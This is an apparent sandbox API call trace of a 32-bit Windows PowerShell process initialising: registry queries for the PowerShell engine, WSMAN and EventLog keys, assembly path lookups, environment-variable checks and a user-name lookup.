	[0225.702] ReadFile (in: hFile=0x35c, lpBuffer=0x3196cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x3196cbc*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.702] GetLastError () returned 0x0
	[0225.703] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9b8 | out: phkResult=0x10e9b8*=0x35c) returned 0x0
	[0225.703] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x0, lpcbData=0x10e9fc*=0x0 | out: lpType=0x10ea00*=0x1, lpData=0x0, lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.703] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x5090b0, lpcbData=0x10e9fc*=0x56 | out: lpType=0x10ea00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.703] RegCloseKey (hKey=0x35c) returned 0x0
	[0225.705] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xe9ec865b, Data2=0x9fd5, Data3=0x40e1, Data4=([0]=0xa7, [1]=0xf8, [2]=0xcf, [3]=0xe7, [4]=0xc3, [5]=0xee, [6]=0xe6, [7]=0x3d))) returned 0x0
	[0225.705] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xb5e4ada1, Data2=0x5e93, Data3=0x4772, Data4=([0]=0x8d, [1]=0x26, [2]=0xdd, [3]=0x38, [4]=0xeb, [5]=0xab, [6]=0xcd, [7]=0x2b))) returned 0x0
	[0225.705] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c
	[0225.706] GetLastError () returned 0x0
	[0225.706] GetFileType (hFile=0x35c) returned 0x1
	[0225.706] SetErrorMode (uMode=0x1) returned 0x1
	[0225.706] GetFileType (hFile=0x35c) returned 0x1
	[0225.706] ReadFile (in: hFile=0x35c, lpBuffer=0x31cdbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x31cdbc8*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.795] GetLastError () returned 0x0
	[0225.796] ReadFile (in: hFile=0x35c, lpBuffer=0x31cdbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x31cdbc8*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.796] GetLastError () returned 0x0
	[0225.796] ReadFile (in: hFile=0x35c, lpBuffer=0x31cdbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x31cdbc8*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.796] GetLastError () returned 0x0
	[0225.796] ReadFile (in: hFile=0x35c, lpBuffer=0x31cdbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x31cdbc8*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.796] GetLastError () returned 0x0
	[0225.797] ReadFile (in: hFile=0x35c, lpBuffer=0x31cdbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x31cdbc8*, lpNumberOfBytesRead=0x10ea34*=0xe98, lpOverlapped=0x0) returned 1
	[0225.797] GetLastError () returned 0x0
	[0225.797] ReadFile (in: hFile=0x35c, lpBuffer=0x31cd200, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x31cd200*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.797] GetLastError () returned 0x0
	[0225.797] ReadFile (in: hFile=0x35c, lpBuffer=0x31cdbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x31cdbc8*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.797] GetLastError () returned 0x0
	[0225.798] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9b8 | out: phkResult=0x10e9b8*=0x35c) returned 0x0
	[0225.798] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x0, lpcbData=0x10e9fc*=0x0 | out: lpType=0x10ea00*=0x1, lpData=0x0, lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.798] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x5090b0, lpcbData=0x10e9fc*=0x56 | out: lpType=0x10ea00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e9fc*=0x56) returned 0x0
	[0225.798] RegCloseKey (hKey=0x35c) returned 0x0
	[0225.800] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x1f28bee5, Data2=0xceb0, Data3=0x4245, Data4=([0]=0xaa, [1]=0xc0, [2]=0xb4, [3]=0xa3, [4]=0x47, [5]=0x78, [6]=0xda, [7]=0x19))) returned 0x0
	[0225.800] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x98dab320, Data2=0xe3db, Data3=0x49d7, Data4=([0]=0xbe, [1]=0x21, [2]=0x1c, [3]=0x6e, [4]=0x8c, [5]=0x1d, [6]=0x31, [7]=0xa3))) returned 0x0
	[0225.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0225.907] GetLastError () returned 0x57
	[0225.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0225.907] GetLastError () returned 0x57
	[0225.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0225.927] GetLastError () returned 0x57
	[0225.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0225.927] GetLastError () returned 0x57
	[0225.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.931] GetLastError () returned 0x57
	[0225.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.932] GetLastError () returned 0x57
	[0225.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0225.936] GetLastError () returned 0x57
	[0225.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0225.936] GetLastError () returned 0x57
	[0225.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0225.940] GetLastError () returned 0x57
	[0225.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0225.941] GetLastError () returned 0x57
	[0225.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0225.944] GetLastError () returned 0x57
	[0225.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0225.944] GetLastError () returned 0x57
	[0225.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.946] GetLastError () returned 0x57
	[0225.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.947] GetLastError () returned 0x57
	[0226.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.089] GetLastError () returned 0xcb
	[0226.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.090] GetLastError () returned 0xcb
	[0226.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.091] GetLastError () returned 0xcb
	[0226.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.092] GetLastError () returned 0xcb
	[0226.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.095] GetLastError () returned 0xcb
	[0226.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.096] GetLastError () returned 0xcb
	[0226.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.098] GetLastError () returned 0xcb
	[0226.101] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10eaac | out: phkResult=0x10eaac*=0x35c) returned 0x0
	[0226.103] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10eafc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10eb00, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10eafc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10eb00*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.105] RegEnumValueW (in: hKey=0x35c, dwIndex=0x0, lpValueName=0x5090b0, lpcchValueName=0x10eb24, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10eb24, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0226.105] RegEnumValueW (in: hKey=0x35c, dwIndex=0x1, lpValueName=0x5090b0, lpcchValueName=0x10eb24, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10eb24, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0226.105] RegQueryValueExW (in: hKey=0x35c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10eb04, lpData=0x0, lpcbData=0x10eb00*=0x0 | out: lpType=0x10eb04*=0x1, lpData=0x0, lpcbData=0x10eb00*=0x8) returned 0x0
	[0226.106] RegQueryValueExW (in: hKey=0x35c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10eb04, lpData=0x5090b0, lpcbData=0x10eb00*=0x8 | out: lpType=0x10eb04*=0x1, lpData="2.0", lpcbData=0x10eb00*=0x8) returned 0x0
	[0226.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea68 | out: phkResult=0x10ea68*=0x334) returned 0x0
	[0226.468] RegQueryInfoKeyW (in: hKey=0x334, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10eab8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10eabc, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10eab8*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10eabc*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.468] RegEnumValueW (in: hKey=0x334, dwIndex=0x0, lpValueName=0x5090b0, lpcchValueName=0x10eae0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10eae0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0226.469] RegEnumValueW (in: hKey=0x334, dwIndex=0x1, lpValueName=0x5090b0, lpcchValueName=0x10eae0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10eae0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0226.469] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10eac0, lpData=0x0, lpcbData=0x10eabc*=0x0 | out: lpType=0x10eac0*=0x1, lpData=0x0, lpcbData=0x10eabc*=0x8) returned 0x0
	[0226.469] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10eac0, lpData=0x5090b0, lpcbData=0x10eabc*=0x8 | out: lpType=0x10eac0*=0x1, lpData="2.0", lpcbData=0x10eabc*=0x8) returned 0x0
	[0226.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.470] GetLastError () returned 0xcb
	[0226.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.473] GetLastError () returned 0xcb
	[0226.480] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea28 | out: phkResult=0x10ea28*=0x338) returned 0x0
	[0226.480] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ea90, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ea8c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ea90*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ea8c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.483] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x5090b0, lpcchName=0x10eaac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10eaac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.483] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x5090b0, lpcchName=0x10eaac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10eaac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.483] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x5090b0, lpcchName=0x10eaac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10eaac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.483] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x5090b0, lpcchName=0x10eaac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10eaac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.483] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x5090b0, lpcchName=0x10eaac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10eaac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.484] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x5090b0, lpcchName=0x10eaac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10eaac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.484] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x5090b0, lpcchName=0x10eaac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10eaac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.484] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x5090b0, lpcchName=0x10eaac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10eaac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.484] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x5090b0, lpcchName=0x10eaac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10eaac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.484] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x33c) returned 0x0
	[0226.485] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x0) returned 0x2
	[0226.485] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x358) returned 0x0
	[0226.485] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x0) returned 0x2
	[0226.485] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x364) returned 0x0
	[0226.486] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x0) returned 0x2
	[0226.486] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x368) returned 0x0
	[0226.486] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x0) returned 0x2
	[0226.486] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x36c) returned 0x0
	[0226.487] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x0) returned 0x2
	[0226.487] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x370) returned 0x0
	[0226.487] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x0) returned 0x2
	[0226.487] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x374) returned 0x0
	[0226.487] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x0) returned 0x2
	[0226.488] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x378) returned 0x0
	[0226.488] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x0) returned 0x2
	[0226.488] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x37c) returned 0x0
	[0226.488] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea58 | out: phkResult=0x10ea58*=0x380) returned 0x0
	[0226.489] RegCloseKey (hKey=0x380) returned 0x0
	[0226.489] RegCloseKey (hKey=0x338) returned 0x0
	[0226.490] RegCloseKey (hKey=0x37c) returned 0x0
	[0226.504] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x528ed0, nSize=0x10eba4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10eba4) returned 0x1
	[0226.595] GetLastError () returned 0x3
	[0226.596] GetUserNameW (in: lpBuffer=0x5090b0, pcbBuffer=0x10ebac | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10ebac) returned 1
	[0226.624] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ea0c | out: phkResult=0x10ea0c*=0x338) returned 0x0
	[0226.625] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ea74, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ea70, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ea74*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ea70*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
